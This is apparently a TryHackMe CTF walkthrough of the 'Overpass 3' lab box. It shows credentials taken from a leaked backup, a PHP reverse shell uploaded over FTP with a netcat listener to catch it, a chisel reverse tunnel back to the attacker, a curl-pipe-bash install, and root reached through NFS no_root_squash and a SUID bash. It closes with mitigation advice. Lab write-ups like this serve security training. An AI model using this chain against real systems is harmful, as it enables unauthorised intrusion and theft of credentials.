BOX OVERVIEW
- Link: https://tryhackme.com/room/overpass3hosting
- Difficulty: Medium
- Target: web, user, root flags
- Highlight: port forwarding with
chisel
- Tools:
nmap
,dirb
,linpeas
- Technology:
ftp
,ssh
,nfs
PREMISE

This is the third and final installment of the Overpass challenges on TryHackMe. Here are the other two overpass walkthroughs, just in case you missed them:
In today’s challenge, the team of comp-sci students is at it again with a new website hosting company. However, they haven’t learned much yet about security.
We’ll hack into their new site and escalate our privileges to the root user, and show them that they need to make some security upgrades.
ENUMERATION

First, we’ll note down our IPs in export format to use as bash variables.
export targetIP=10.10.232.238 export myIP=10.6.2.23
Let’s also start a regular nmap
scan of all ports, and a dirb
scan to sniff out web app directories.
The dirb
scan found a /backups
directory that reveals a backups.zip
file.
/backups (backups.zip) ─[kalisurfer@parrot]─[~] └──╼ $dirb http://10.10.232.238 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Jan 5 11:16:14 2023 URL_BASE: http://10.10.232.238/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.232.238/ ---- ==> DIRECTORY: http://10.10.232.238/backups/ + http://10.10.232.238/cgi-bin/ (CODE:403|SIZE:217) + http://10.10.232.238/index.html (CODE:200|SIZE:1770) ---- Entering directory: http://10.10.232.238/backups/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Thu Jan 5 11:23:15 2023 DOWNLOADED: 4612 - FOUND: 2
After unzipping the backups.zip
file, we have two files:
priv.key
CustomerDetails.xlsx.pgp
Let’s move ahead and import the priv.key
file using pgp
.
pgp –import priv.key pgp –decrypt-file CustomerDetails.xlsx.pgp
And now there is a third file: CustomerDetails.xlsx
This file is a spreadsheet with customer data including username/passwords and credit card numbers! Let’s record the passwords in our notes.txt
file for later reference.
username:password
paradox ShibesAreGreat123
0day OllieIsTheBestDog
muirlandoracle A11D0gsAreAw3s0me
The nmap
scan shows a few ports open: An FTP service running on port 21, SSH on 22, HTTP on 80.
The FTP server may allow anonymous login. We’ll test that out soon. First, we’ll drill in a bit more on the open ports with a second nmap
scan:

WALKING THE WEBSITE

There’s not much of use on the website running on port 80. Nothing stands out in the text on the site except the potential usernames and hobbies:
Paradox - Our lead web designer, Paradox can help you create your dream website from the ground up
Elf - Overpass' newest intern, Elf. Elf helps maintain the webservers day to day to keep your site running smoothly and quickly.
MuirlandOracle - HTTPS and networking specialist. Muir's many years of experience and enthusiasm for networking keeps Overpass running, and your sites, online all of the time.
NinjaJc01 - James started Overpass, and keeps the business side running. If you have pricing questions or want to discuss how Overpass can help your business, reach out to him!
A quick look through the source code and the developer mode doesn’t reveal anything more here.
CONNECTING WITH FTP
We test out connecting to the FTP service as user paradox with the command:
lftp -u paradox $targetIP
password=ShibesAreGreat123 (from the xlsx spreadsheet)
We are connected and can see a bunch of files and a directory for backups.

Now that we are connected to the web hosting service, we can upload a payload to spawn a reverse shell to give us an initial foothold into the box.
CRAFTING A REVERSE SHELL PAYLOAD

We’ll use the pentest monkey php reverse shell from revshells.com. This is a good choice because PHP files autorun on websites when the page is loaded. I’ve also used this payload successfully before on another box.
Let’s go ahead and copy the PHP reverse shell, add our lhost
and lport
to the file, and save the revshell as rev.php
. I’ll use port 8888.
UPLOADING THE PAYLOAD WITH FTP
Let’s use the terminal window still connected to the FTP service to upload the rev.php
file with the command:
put rev.php
And now, the file is in position and ready to use.
SPINNING UP A NETCAT LISTENER TO CATCH A REVSHELL

nc -lvnp 8888
Next we’ll navigate in our browser to $targetIP/revshell.php
At this point, our netcat listener catches the revshell and we now have an initial foothold as user apache!!

Let’s search for the web.flag
file with the following command:
find / -type f -name web.flag 2>/dev/null
The last part of this command (2>/dev/null
) sends the error messages to a null byte, hiding all of the errors.
And we’ve found it!
/usr/share/httpd/web.flag
STABILIZE A REVSHELL
We can use a Python one-liner to stabilize the shell enough to be able to switch users.
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we can do a lateral move over to paradox’s account with the password from the spreadsheet.
su paradox
RUNNING LINPEAS ON THE TARGET MACHINE

The most interesting finding of linpeas
is:
╔══════════╣ Analyzing NFS Exports Files (limit 70) -rw-r--r--. 1 root root 54 Nov 18 2020 /etc/exports /home/james *(rw,fsid=0,sync,no_root_squash,insecure)
The no_root_squash
is a misconfiguration that allows unprivileged users to gain root access to the machine.
👉 Recommended: No Root Squash
We can see that it is set in user James’ home folder. So now our attack vector is becoming clearer. We will look for ways to privilege escalate over the James’ account.
BECOMING PARADOX
After stabilizing the revshell we can try a lateral move and switch users to paradox
:
su paradox Password(ShibesAreGreat123)
EXPLOITING NFS WITH NO_ROOT_SQUASH

Following up now on the linpeas
results, let’s investigate this NFS service a bit more. Nothing showed up in the nmap
scan, but it did in the linpeas
results so my hunch is that the service is firewalled from the outside.
This isn’t a problem to work around, but we need to determine the port that the service is operating on. With the following command on the target machine we can find the port:
rpcinfo -p | grep nfs
We can see in the output that NFS is running on port is 2049. We’ll use a specialized secure ssh port forwarding tool, chisel
to help us reroute the blocked port to our attack machine.
USING CHISEL TO PORT FORWARD
We’ll need to grab chisel
from the GitHub page. There are a few ways to install it from the repo. I chose to use the one-liner:
curl https://i.jpillora.com/chisel! | bash
Once installed, I copied the chisel
bin file over to the target machine. To get this done, we’ll spin up a simple HTTP server using Python, and then curl
the file from the target machine.
Now that chisel
is on both machines, let’s create the secure SSH tunnel with the following commands to set up port forwarding on the NFS service running on port 2049, but firewalled to the public.
From the attack box:
chisel server -p 7777 --reverse -v
From victim box:
./chisel client 10.6.2.23:7777 R:2049:127.0.0.1:2049 &
The &
at the end of the command instructs bash to run the command in the background in a subshell.
BECOMING JAMES

Now let’s check to see if the NFS has any mountable directories available:
showmount -e $targetIP:2049
Another way to check is to run:
cat /etc/exports
Now let’s go ahead and mount to the folder /mount
(which already exists on my machine):
sudo mount -t nfs $targetIP:/ /mount
The user.flag
is right there in the /home/james
directory! Checking for hidden files and directories with “ls -la
” reveals a hidden directory (.ssh
). Inside this directory we’ve found an ssh key.
Let’s copy this over to our machine so that we can ssh
directly into James’ directory without needing their password.

GAINING ROOT PRIVILEGES WITH PERSISTENCE
From James’ account, we should be able to both set and run files with suid
bits to spawn bash as root in persistence mode. Let’s first copy /bin/bash
to our current file:
On target box:
cp /bin/bash .
And then add execute and add the SUID bit from our mounted NFS folder on the attack box:
chmod +xs bash
Last, but not least, let’s run it with persistence from the target box:
./bash -p
And we are now root! Let’s grab the root.txt
in /root/root.txt
.

RECOMMENDED MITIGATION STEPS

- Disable
no_root_squash
on NFS - Change permissions on all parts of the website that are not intended to be seen by the public. This includes the
/backups
folder
👉 Recommended Tutorial: TryHackMe Challenge – Wonderland

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.